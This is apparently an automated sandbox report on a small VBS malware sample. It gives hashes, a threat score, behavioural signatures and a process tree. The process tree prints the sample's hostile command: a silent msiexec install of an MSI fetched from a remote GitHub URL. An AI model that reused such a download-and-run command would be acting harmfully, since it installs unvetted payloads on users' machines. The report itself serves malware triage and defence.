Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
01-12-2024 02:15
Static task
static1
Behavioral task
behavioral1
Sample
23723f9b4239194a21bf0df559f9e9df8aec1399899346311c09cdcd91a9f1b0.vbs
Resource
win7-20240903-en
windows7-x64
5 signatures
150 seconds
General
-
Target
23723f9b4239194a21bf0df559f9e9df8aec1399899346311c09cdcd91a9f1b0.vbs
-
Size
876B
-
MD5
183d51767fe58e2bd256688315d25709
-
SHA1
2c0f959b61081a10a085ad8e8f8741a69e2d9934
-
SHA256
23723f9b4239194a21bf0df559f9e9df8aec1399899346311c09cdcd91a9f1b0
-
SHA512
f5c06582247afab9d6f3c60b62334ed93d4ee7e447b0299e8959dbec5620def6fb1a8ea17e3c3537b4e7ff2c6661b5396e78e1688ec6267076b01068572e76ed
Score
7/10
Malware Config
Signatures
-
Use of msiexec (install) with remote resource 1 IoCs
pid Process 2400 msiexec.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2352 msiexec.exe 6 2352 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeShutdownPrivilege 2400 msiexec.exe Token: SeIncreaseQuotaPrivilege 2400 msiexec.exe Token: SeRestorePrivilege 2352 msiexec.exe Token: SeTakeOwnershipPrivilege 2352 msiexec.exe Token: SeSecurityPrivilege 2352 msiexec.exe Token: SeCreateTokenPrivilege 2400 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2400 msiexec.exe Token: SeLockMemoryPrivilege 2400 msiexec.exe Token: SeIncreaseQuotaPrivilege 2400 msiexec.exe Token: SeMachineAccountPrivilege 2400 msiexec.exe Token: SeTcbPrivilege 2400 msiexec.exe Token: SeSecurityPrivilege 2400 msiexec.exe Token: SeTakeOwnershipPrivilege 2400 msiexec.exe Token: SeLoadDriverPrivilege 2400 msiexec.exe Token: SeSystemProfilePrivilege 2400 msiexec.exe Token: SeSystemtimePrivilege 2400 msiexec.exe Token: SeProfSingleProcessPrivilege 2400 msiexec.exe Token: SeIncBasePriorityPrivilege 2400 msiexec.exe Token: SeCreatePagefilePrivilege 2400 msiexec.exe Token: SeCreatePermanentPrivilege 2400 msiexec.exe Token: SeBackupPrivilege 2400 msiexec.exe Token: SeRestorePrivilege 2400 msiexec.exe Token: SeShutdownPrivilege 2400 msiexec.exe Token: SeDebugPrivilege 2400 msiexec.exe Token: SeAuditPrivilege 2400 msiexec.exe Token: SeSystemEnvironmentPrivilege 2400 msiexec.exe Token: SeChangeNotifyPrivilege 2400 msiexec.exe Token: SeRemoteShutdownPrivilege 2400 msiexec.exe Token: SeUndockPrivilege 2400 msiexec.exe Token: SeSyncAgentPrivilege 2400 msiexec.exe Token: SeEnableDelegationPrivilege 2400 msiexec.exe Token: SeManageVolumePrivilege 2400 msiexec.exe Token: SeImpersonatePrivilege 2400 msiexec.exe Token: SeCreateGlobalPrivilege 2400 msiexec.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 2568 wrote to memory of 2400 2568 WScript.exe 30 PID 2568 wrote to memory of 2400 2568 WScript.exe 30 PID 2568 wrote to memory of 2400 2568 WScript.exe 30 PID 2568 wrote to memory of 2400 2568 WScript.exe 30 PID 2568 wrote to memory of 2400 2568 WScript.exe 30
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\23723f9b4239194a21bf0df559f9e9df8aec1399899346311c09cdcd91a9f1b0.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi /qn2⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
PID:2400
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2352